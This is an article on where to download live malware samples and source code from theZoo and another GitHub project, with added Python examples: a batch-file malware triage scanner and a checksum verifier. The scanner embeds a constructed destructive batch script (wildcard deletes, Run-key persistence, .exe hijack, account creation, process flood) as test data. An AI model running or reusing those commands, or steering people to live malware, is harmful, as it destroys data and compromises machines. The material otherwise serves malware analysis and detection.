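An added Python example, not from the page, that turns the list above around for the defender: a triage script that flags a batch file for the behaviours the commands above produce (unprompted mass delete, self-copy via %0, Run-key persistence, Explorer policy lockout, .exe/.lnk association hijack, mouse or keyboard tampering via rundll32, clock changes, account creation, volume relabelling, shutdown, and the “start explorer” flood from the “kill Windows” recipe). The patterns, the flood threshold and both sample scripts are this example's own assumptions; the scripts are constructed and are only scanned, never executed.

```python
import re

# Each indicator is built from a command the text lists, named for the effect that command has.
BATCH_INDICATORS = [
    ("destructive-delete", re.compile(r"\bdel\b[^\n&|]*(\*\.\*|/q)", re.I)),
    ("run-key-persistence", re.compile(r"\breg\s+add\b.*CurrentVersion\\Run\b", re.I)),
    ("explorer-policy", re.compile(r"\breg\s+add\b.*Policies\\Explorer\b", re.I)),
    ("self-copy", re.compile(r"\bcopy\b.*%~?f?0\b", re.I)),
    ("extension-hijack", re.compile(r"\bassoc\s+\.(exe|lnk|bat|cmd)\s*=", re.I)),
    ("input-tamper", re.compile(r"\brundll32\b.*(disableoemlayer|swapmousebutton|keyboard,\s*disable|mouse,\s*disable)", re.I)),
    ("clock-tamper", re.compile(r"^\s*(time|date)\s+\d", re.I)),
    ("account-add", re.compile(r"\bnet\s+user\b.*\s/add\b", re.I)),
    ("volume-relabel", re.compile(r"^\s*label\s+[a-z]:", re.I)),
    ("shutdown", re.compile(r"^\s*shutdown\b", re.I)),
]
START_LINE = re.compile(r"^\s*start\b", re.I)
FLOOD_THRESHOLD = 10     # assumption: this many `start` lines in one script is a process flood


def triage_batch(script: str) -> dict:
    """Scan a batch script line by line and report which indicators fire on which lines."""
    hits = {}
    starts = 0
    for lineno, line in enumerate(script.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.lower().startswith(("rem ", "::")):
            continue                                   # comments never execute
        if START_LINE.match(stripped):
            starts += 1
        for name, pattern in BATCH_INDICATORS:
            if pattern.search(stripped):
                hits.setdefault(name, []).append(lineno)
    flood = starts >= FLOOD_THRESHOLD
    # "@echo off" is not malicious by itself, but it is how these scripts hide what they run
    echo_off = bool(re.search(r"^\s*@echo\s+off\b", script, re.I | re.M))
    return {
        "indicators": hits,
        "start_count": starts,
        "process_flood": flood,
        "echo_off": echo_off,
        "verdict": "malicious" if hits or flood else "clean",
    }


# Constructed sample: the commands from the page assembled into one script.
SAMPLE_BAT = r"""@echo off
del F:\*.* /q
label F:HACK
time 14:13
date 11.07.12
copy %0 C:\Time.bat
copy "%0" "%SystemRoot%\system32\File.bat"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "File1" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
assoc .exe=.mp3
rundll32 user32,SwapMouseButton
net user Smoked /add
""" + "start explorer\n" * 12

# Constructed sample: a harmless maintenance script that uses some of the same commands benignly.
BENIGN_BAT = r"""@echo off
rem nightly copy of the project tree
xcopy C:\Projects D:\Backup\Projects /s /e /y >nul
del D:\Backup\old.log
set LOGDIR=D:\Backup
echo done
"""


if __name__ == "__main__":
    for label, script in (("sample", SAMPLE_BAT), ("benign", BENIGN_BAT)):
        report = triage_batch(script)
        print(label, report["verdict"], report["indicators"], "start lines:", report["start_count"])
```

The point of the benign script is that del, copy and set on their own prove nothing; what the triage keys on is the combination the page's recipes rely on: a wildcard or /q on del, %0 on copy, and reg add aimed at Run or at Explorer policies.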

Where to download virus samples from source code and a detailed description?

Finding a collection of current viruses, let alone one with descriptions and source code, is not easy. We have already told you where to analyse and study them. Today I will tell you about another source where you can find and download not just malware caught on the network, but executable files and virus sources with detailed information.

In this article you will learn about a couple of interesting projects that offer to plunge into the world of the source code of all kinds of Trojans, botnets, stealers, worms and so on.

  • Preface
  • Virus sources
  • theZoo Project
  • Malware Project

Why and who might need virus samples?

Executable files and virus sources may be needed to analyse the technologies used by malware, to study the behaviour of viruses in a system (monitoring the file system, processes and so on) and to test antiviruses. Antivirus company employees are willing to pay for the source code of a new virus.

Is it legal to download viruses?

You may download virus samples to study and analyse on your own computer, but you may not distribute them or infect others with them. See Article 273 of the Criminal Code of the Russian Federation.

The purpose of these projects is to give antivirus company specialists and people interested in malware analysis an understanding of how malicious code is built.

Attention! Keep in mind that the downloaded files are working viruses. Some of them will try to infect your computer. Never run downloaded files on your main computer. I also do not recommend downloading virus samples without special knowledge of malware analysis.

In any case, the website www.site does not bear any responsibility for any damage caused by you to your own or other people’s computers.

I highly recommend using an isolated virtual machine. Don't forget about worms, which will try to spread and escape from the virtual machine. To prevent this, disable the virtual machine's Guest Additions, network access and so on.

Virus sources: theZoo Project

Let's start the review with theZoo, a zoo of malware (the authors have a sense of humour). It lives in a GitHub repository.

The goal of the project is to make the study of viruses accessible. The authors collect and update the malware database. With theZoo you get access to popular malware samples.

Virus samples: theZoo Project

Both the executable file and the source code are offered for downloading and studying.

How to use theZoo?

You can use theZoo in two ways: directly from the repository or through its framework. We will look at both, starting with the first.

So we go to the repository and see several directories and files.

Virus executables are in the directory:

theZoo/malwares/Binaries/

Each piece of malware has its own directory there, containing four files: the malware itself in a password-protected ZIP archive, SHA256 and MD5 checksums of the archive for verification, and the password for the archive.


Virus executables: Androrat Trojan

Virus source code is in the directory:

theZoo/malwares/Source/Original/

Each directory contains the same four kinds of files as for the executables.
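An added Python example (not part of theZoo or of this article) of the check worth doing before touching a sample directory: hash the archive, compare it with the .md5 and .sha files next to it, and list the archive's members from the central directory without extracting anything, including whether each member is still flagged as encrypted. The file naming (name.zip, name.md5, name.sha and name.pass in a directory called name) follows the layout described above but is an assumption of this example; the sample directory is constructed by the block and holds a harmless text file, so it is deliberately not encrypted and reports ok_to_handle as False.

```python
import hashlib
import os
import tempfile
import zipfile


def read_hash_file(path: str) -> str:
    """The .md5/.sha files hold a hex digest, possibly followed by a file name (md5sum/sha256sum style)."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        return f.read().split()[0].lower()


def file_digests(path: str):
    """MD5 and SHA-256 of a file, streamed so large archives are not read into memory at once."""
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            md5.update(chunk)
            sha256.update(chunk)
    return md5.hexdigest(), sha256.hexdigest()


def inspect_sample(sample_dir: str) -> dict:
    """Verify the archive against both checksum files and list its members without extracting anything."""
    name = os.path.basename(os.path.normpath(sample_dir))
    archive = os.path.join(sample_dir, name + ".zip")
    md5_hex, sha_hex = file_digests(archive)
    report = {
        "archive": archive,
        "md5_ok": md5_hex == read_hash_file(os.path.join(sample_dir, name + ".md5")),
        "sha256_ok": sha_hex == read_hash_file(os.path.join(sample_dir, name + ".sha")),
        "members": [],
        "all_encrypted": True,
    }
    with zipfile.ZipFile(archive) as zf:              # reading the central directory decrypts nothing
        for info in zf.infolist():
            encrypted = bool(info.flag_bits & 0x1)    # general-purpose bit 0: entry is password protected
            report["members"].append((info.filename, info.file_size, encrypted))
            report["all_encrypted"] = report["all_encrypted"] and encrypted
    report["hashes_ok"] = report["md5_ok"] and report["sha256_ok"]
    # Handle it only if both digests match and no member can be opened by an accidental double-click
    report["ok_to_handle"] = report["hashes_ok"] and report["all_encrypted"]
    return report


def build_constructed_sample(root: str = None, name: str = "Sample.Constructed",
                             corrupt_sha: bool = False) -> str:
    """Constructed stand-in for a sample directory: harmless text inside, no password, so not encrypted."""
    root = root or tempfile.mkdtemp()
    sample_dir = os.path.join(root, name)
    os.makedirs(sample_dir, exist_ok=True)
    archive = os.path.join(sample_dir, name + ".zip")
    with zipfile.ZipFile(archive, "w") as zf:
        zf.writestr("README.txt", "constructed placeholder, not malware\n")
    md5_hex, sha_hex = file_digests(archive)
    with open(os.path.join(sample_dir, name + ".md5"), "w") as f:
        f.write(md5_hex + "  " + name + ".zip\n")
    with open(os.path.join(sample_dir, name + ".sha"), "w") as f:
        f.write(("0" * 64 if corrupt_sha else sha_hex) + "  " + name + ".zip\n")
    with open(os.path.join(sample_dir, name + ".pass"), "w") as f:
        f.write("constructed\n")
    return sample_dir


if __name__ == "__main__":
    report = inspect_sample(build_constructed_sample())
    print("hashes match:", report["hashes_ok"], "| all members encrypted:", report["all_encrypted"])
    for member, size, encrypted in report["members"]:
        print(f"  {member}  {size} bytes  encrypted={encrypted}")
    print("ok to handle:", report["ok_to_handle"])
```

Point inspect_sample at a real directory from the repository and read the report before the password ever leaves the .pass file; a hash mismatch means the archive is not the one the maintainers published, and an unencrypted member means the sample is one click away from running on whatever machine you are sitting at.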


Virus sources: Dendroid Trojan

There is help for each sample, but to use it you need to install the framework.

To install theZoo framework, use the command:

git clone https://github.com/ytisf/theZoo

Requirements: urllib2, python3

Commands: search, use, get, info, list all, report-mal, update-db, exit. The help command describes them in more detail.

That covers this project; now let's look at another one.

Virus Samples: Project Malware

The Malware project is also hosted on GitHub. The selection is not as large as in theZoo, but it is updated more often. Among the small number of malicious programs you can find the source code of Trojans, botnets, ransomware, password stealers and other goodies.

Here is the list for today:

  • Alina Spark (Trojan)
  • Bleeding Life 2 (Exploit pack)
  • Carberp (Botnet)
  • Carberp (Banking Trojan)
  • Crimepack 3.1.3 (Exploit pack)
  • Dendroid (Trojan for Android)
  • Dexter v2 (Trojan)
  • Eda2, Stolich, Win32.Stolich (Ransomware)
  • FlexiSpy (Spyware)
  • (Framework)
  • GMBot (Android Trojan)
  • Gozi-ISFB - (Banking Trojan)
  • Grum (Spam bot)
  • Hacking Team RCS ()
  • Hidden Tear (Ransomware)
  • KINS (Banking Trojan)
  • Mirai (Internet of Things Botnet)
  • Pony 2.0 (Password Stealer)
  • PowerLoader (Botnet)
  • RIG Front-end (Exploit pack)
  • Rovnix (Bootkit)
  • Tinba (Banking Trojan)
  • TinyNuke (Banking Trojan)
  • Trochilus, RedLeaves (RAT)
  • Zeus (Banking Trojan)

Virus source code: Malware Project

For example, open the folder of the Alina Trojan. It offers several directories, including the source code, and at the bottom the authors have added links to information about the malware.